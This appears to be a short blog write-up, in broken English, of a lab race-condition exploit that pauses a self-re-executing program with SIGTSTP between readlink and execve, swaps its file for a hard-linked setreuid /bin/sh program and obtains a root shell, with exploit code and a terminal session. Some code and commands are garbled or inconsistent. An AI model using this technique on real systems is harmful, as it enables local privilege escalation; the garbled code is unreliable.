본문 바로가기

Research/Exploitation

[Docs] Race Condition Exploit with Unix Signal

Race Condition Exploit with Unix Signal

This is the first time, i learn about race condition exploit with Unix Signal

what a fresh idea!!


Example Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <unistd.h>
int main(int argc, char *argv[]) {
    char buf[4096];
 
    if (argc < 2){
        if (readlink("/proc/self/exe", buf, sizeof(buf)) < 0return 1;
 
        char *args [] = { buf, "1"0 };
        if (execve(args[0], args, 0< 0return 1;
    }
 
    return 0;
}
// Sourced by StalkR
cs

What this program works is

When argc is under 2, Getting itself path ( /proc/self/exe ) with readlink func, and running the program with execve..


It's All.

First time, i saw this source. How could i exploit it? What could i use?

and i search, then i finally found Race Condition Exploit with Unix Signal written by pwn3r


What is Unix Signal?

what is Unix Signal,

 

Description about Unix Signal : http://en.wikipedia.org/wiki/Unix_signal

In Short, Simply, specific process informs event occured specific thread through signal 

 

and below signal is what we use today

SIGTSTP 20 Terminal stop signal (POSIX)

 

The Idea is, After Giving SIGTSTP Signal between readlink and execve ( then it'll be stopeed ), Changing origin program to what we wanna execute

 

what we wanna execute is executing /bin/sh program

 

then, what we need to make is..

- program which sends SIGTSTP signal

- program which executes /bin/sh 

 

First, Sending SIGTSTP singal to stop vulnerable program.

Then, Changing the program to program which executes /bin/sh

 

this is how exploit is going

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>
#include <signal.h>
 
void signal_handler(int signo){
    printf("Run~!\n"); 
}
 
int main(){
    signal(SIGTSTP, signal_handler);
    sleep(20);
    execl("/home/Desktop/Lab/rc",0);
}
cs

When getting SIGTSTP signal, signal_handler will be executed and execl func is executed. Because of registering singnal handler.

If you don't register hanlder, the program which sends SIGTSTP signal either might be stopped.

1
2
3
4
int main(){
    setreuid(geteuid(),geteuid());
    execl("/bin/sh""sh"0);
}
cs

Conculsion

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Terminal 1
zero@ubuntu:~Desktop/Lab$./rc
 
Terminal 2
zero@ubuntu:~Desktop/Lab$ while[1]; do kill -10 pid; done
 
Terminal 1
zero@ubuntu:~Desktop/Lab$./rc
Run~!
 
 [1]+ Stopped ./rc
 
Terminal 2
zero@ubuntu:~Desktop/Lab$ ln -f ./shell ./rc
 
And Continue the process...
 
Terminal 1
zero@ubuntu:~Desktop/Lab$fg 1
./sig
#
cs

This is End

 

Ref : http://pwn3r.tistory.com/entry/Docs-Exploiting-Race-Condition-Vulnerability-with-Unix-Signal

 

Epilogue

Race Condition Exploit with Unix Signal ... Cool Exploit!